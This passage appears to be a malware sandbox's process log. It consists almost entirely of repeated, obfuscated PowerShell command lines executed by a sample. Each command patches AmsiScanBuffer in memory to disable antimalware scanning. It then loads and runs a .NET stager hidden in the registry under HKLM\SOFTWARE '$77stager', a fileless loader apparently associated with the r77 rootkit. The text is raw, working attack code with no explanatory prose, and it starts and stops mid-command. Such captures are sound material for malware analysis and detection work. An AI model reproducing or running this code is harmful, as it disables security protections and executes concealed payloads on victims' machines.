[Char](109)+''+'e'+','+'M'+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$HYoWDPOIOiQ.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+'t'+[Char](44)+'Vi'+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$oGjSYYGWMF,$EKpuAyLjXcnPuH).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $HYoWDPOIOiQ.CreateType();}$cjizPHMVhuxxw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+'em'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+'e'+'M'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+''+'d'+''+'s'+'');$yRciJxbxOLCPdp=$cjizPHMVhuxxw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+'t'+'a'+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PyxXgLCNkVKMAxEHIED=MbrowHOGIfme @([String])([IntPtr]);$TmjYGhsbziOBtWizUThsXY=MbrowHOGIfme @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$esRxtgwtxlh=$cjizPHMVhuxxw.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+'d'+''+'u'+''+'l'+'e'+[Char](72)+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+'l')));$jbmOdxmIiporFy=$yRciJxbxOLCPdp.Invoke($Null,@([Object]$esRxtgwtxlh,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$jdNKLJOvvAgFozYjv=$yRciJxbxOLCPdp.Invoke($Null,@([Object]$esRxtgwtxlh,[Object]('V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+'l'+'P'+'r'+''+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$aextaAd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jbmOdxmIiporFy,$PyxXgLCNkVKMAxEHIED).Invoke('amsi'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$wCMjvIooQraBQiLAO=$yRciJxbxOLCPdp.Invoke($Null,@([Object]$aextaAd,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'an'+'B'+''+'u'+'f'+[Char](102)+''+'e'+''+[Char](114)+'')));$NMplOcYSqd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdNKLJOvvAgFozYjv,$TmjYGhsbziOBtWizUThsXY).Invoke($wCMjvIooQraBQiLAO,[uint32]8,4,[ref]$NMplOcYSqd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wCMjvIooQraBQiLAO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdNKLJOvvAgFozYjv,$TmjYGhsbziOBtWizUThsXY).Invoke($wCMjvIooQraBQiLAO,[uint32]8,0x20,[ref]$NMplOcYSqd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+'tag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GhCCNOuMeeQF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qLCtgtGwpSYSwW,[Parameter(Position=1)][Type]$vvkpMjwTSn)$eVTjuIbvDtD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+[Char](108)+'e'+[Char](103)+'a'+'t'+''+[Char](101)+'Ty'+[Char](112)+'e','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$eVTjuIbvDtD.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+'am'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$qLCtgtGwpSYSwW).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$eVTjuIbvDtD.DefineMethod(''+[Char](73)+'n'+[Char](118)+'ok'+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'ide'+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$vvkpMjwTSn,$qLCtgtGwpSYSwW).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $eVTjuIbvDtD.CreateType();}$aqtYHnxrzFlkp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+'i'+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t.'+'W'+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+'e'+[Char](78)+'a'+'t'+''+'i'+''+[Char](118)+''+'e'+'M'+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$TtyflgIvKAOAtn=$aqtYHnxrzFlkp.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aJOJwbNcgQpzpJXvDpC=GhCCNOuMeeQF @([String])([IntPtr]);$KuOOKhvEwVUmZQlbKnmiBL=GhCCNOuMeeQF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mFGBgWvwsDB=$aqtYHnxrzFlkp.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+'dl'+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+'l'+'l')));$dElNhcHxeJjJRc=$TtyflgIvKAOAtn.Invoke($Null,@([Object]$mFGBgWvwsDB,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+'b'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$NgMjNkWCECwtANeGw=$TtyflgIvKAOAtn.Invoke($Null,@([Object]$mFGBgWvwsDB,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+'u'+'a'+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+'ec'+'t'+'')));$SRdkVhP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dElNhcHxeJjJRc,$aJOJwbNcgQpzpJXvDpC).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.d'+'l'+''+[Char](108)+'');$XazoVNTgcBMIfSXGK=$TtyflgIvKAOAtn.Invoke($Null,@([Object]$SRdkVhP,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+[Char](97)+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$dpAfQsxKdQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NgMjNkWCECwtANeGw,$KuOOKhvEwVUmZQlbKnmiBL).Invoke($XazoVNTgcBMIfSXGK,[uint32]8,4,[ref]$dpAfQsxKdQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XazoVNTgcBMIfSXGK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NgMjNkWCECwtANeGw,$KuOOKhvEwVUmZQlbKnmiBL).Invoke($XazoVNTgcBMIfSXGK,[uint32]8,0x20,[ref]$dpAfQsxKdQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue('$'+'7'+'7'+'s'+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JczsmESwhJCB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WQlCcGNcYhuCTh,[Parameter(Position=1)][Type]$UEHhAgIIXr)$zYgstzqHkiQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'Mo'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+'M'+''+'y'+''+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'ubl'+[Char](105)+''+'c'+','+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'ass',[MulticastDelegate]);$zYgstzqHkiQ.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+'me,'+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+','+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WQlCcGNcYhuCTh).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$zYgstzqHkiQ.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'V'+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$UEHhAgIIXr,$WQlCcGNcYhuCTh).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $zYgstzqHkiQ.CreateType();}$yjDQLqrEYnMba=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.'+'U'+''+[Char](110)+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+'M'+'e'+[Char](116)+''+[Char](104)+'o'+'d'+'s');$cEsBFtdVHUdpVg=$yjDQLqrEYnMba.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mQWsyLVpwVisUNPxLIm=JczsmESwhJCB @([String])([IntPtr]);$CxJYaBWZqrqRHEPwfezRwi=JczsmESwhJCB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xWTGNhslzOE=$yjDQLqrEYnMba.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+'a'+'n'+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+'e'+''+[Char](108)+'3'+'2'+'.'+'d'+''+'l'+'l')));$yqHMqtmEogeEEC=$cEsBFtdVHUdpVg.Invoke($Null,@([Object]$xWTGNhslzOE,[Object](''+[Char](76)+'o'+'a'+'d'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$NEGfhHGPezuNHLQap=$cEsBFtdVHUdpVg.Invoke($Null,@([Object]$xWTGNhslzOE,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+'e'+''+'c'+'t')));$JZdxoOg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yqHMqtmEogeEEC,$mQWsyLVpwVisUNPxLIm).Invoke(''+[Char](97)+'msi.'+'d'+''+[Char](108)+''+[Char](108)+'');$eusjzXqqPsTFzAxsk=$cEsBFtdVHUdpVg.Invoke($Null,@([Object]$JZdxoOg,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$MmbYxiIsYa=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NEGfhHGPezuNHLQap,$CxJYaBWZqrqRHEPwfezRwi).Invoke($eusjzXqqPsTFzAxsk,[uint32]8,4,[ref]$MmbYxiIsYa);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eusjzXqqPsTFzAxsk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NEGfhHGPezuNHLQap,$CxJYaBWZqrqRHEPwfezRwi).Invoke($eusjzXqqPsTFzAxsk,[uint32]8,0x20,[ref]$MmbYxiIsYa);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+'tage'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JGdieeYOFnWC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TXVpyBdgOQhMxX,[Parameter(Position=1)][Type]$UKivCfJqYr)$OBjXtBcdoRW=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+''+[Char](77)+''+[Char](111)+'dul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+[Char](97)+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+'a'+''+'l'+'e'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+','+''+'A'+''+[Char](117)+'toC'+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$OBjXtBcdoRW.DefineConstructor(''+[Char](82)+''+'T'+'S'+'p'+'e'+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+','+'H'+'ide'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TXVpyBdgOQhMxX).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$OBjXtBcdoRW.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+''+[Char](105)+'g'+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$UKivCfJqYr,$TXVpyBdgOQhMxX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e,M'+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OBjXtBcdoRW.CreateType();}$ohgCVcVJVFbfW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+[Char](101)+''+'m'+''+'.'+''+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'n'+'s'+''+'a'+''+[Char](102)+'eN'+'a'+''+[Char](116)+''+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ccGQvdfzfjwnRP=$ohgCVcVJVFbfW.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'oc'+[Char](65)+''+'d'+'d'+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jkIWrpBBfdvGtQBUPKH=JGdieeYOFnWC @([String])([IntPtr]);$sBsqcWPibQeoULiinfNwpE=JGdieeYOFnWC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$bPMHbcIKGCQ=$ohgCVcVJVFbfW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.d'+[Char](108)+'l')));$daOmGEGburwAnt=$ccGQvdfzfjwnRP.Invoke($Null,@([Object]$bPMHbcIKGCQ,[Object]('L'+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$lxnOBYtnGVeJoEWxl=$ccGQvdfzfjwnRP.Invoke($Null,@([Object]$bPMHbcIKGCQ,[Object](''+[Char](86)+''+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+'t'+'ect')));$CnBQgHD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($daOmGEGburwAnt,$jkIWrpBBfdvGtQBUPKH).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$lNtuIjGIYvcvOZSXu=$ccGQvdfzfjwnRP.Invoke($Null,@([Object]$CnBQgHD,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+'u'+'f'+''+'f'+''+[Char](101)+'r')));$RiMElvREJK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lxnOBYtnGVeJoEWxl,$sBsqcWPibQeoULiinfNwpE).Invoke($lNtuIjGIYvcvOZSXu,[uint32]8,4,[ref]$RiMElvREJK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$lNtuIjGIYvcvOZSXu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lxnOBYtnGVeJoEWxl,$sBsqcWPibQeoULiinfNwpE).Invoke($lNtuIjGIYvcvOZSXu,[uint32]8,0x20,[ref]$RiMElvREJK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+'WA'+[Char](82)+'E').GetValue('$77'+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zxorTJThwHcX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BIoQaYwmsrnWVm,[Parameter(Position=1)][Type]$QDyTuVHffL)$NldJaRrIbsn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+'e'+'dD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+'em'+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+'ul'+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$NldJaRrIbsn.DefineConstructor(''+[Char](82)+'T'+'S'+'pe'+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BIoQaYwmsrnWVm).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$NldJaRrIbsn.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+'e'+[Char](119)+''+'S'+''+[Char](108)+'o'+[Char](116)+',V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$QDyTuVHffL,$BIoQaYwmsrnWVm).SetImplementationFlags(''+[